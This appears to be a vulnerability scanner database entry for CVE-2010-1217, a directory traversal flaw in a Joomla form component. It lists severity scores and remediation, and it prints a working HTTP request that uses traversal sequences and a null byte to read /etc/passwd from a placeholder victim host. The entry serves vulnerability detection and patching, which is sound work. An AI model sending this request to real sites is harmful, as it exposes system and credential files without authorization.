| Title | Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. |
| Remediation | Apply all relevant security patches and product upgrades. |
| CVSS Score | 4.3 |
| EPSS Score | 0.07857 |
| CVE ID | CVE-2010-1217 |
| CWE ID | CWE-22 |
| Tags | cve cve2010 edb packetstorm joomla lfi plugin je_form_creator vuln |
A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE – the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
GET /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-1217.yaml
🦈 Packet Capture: ⬇️ Download cve-2010-1217.pcap
N/AN/A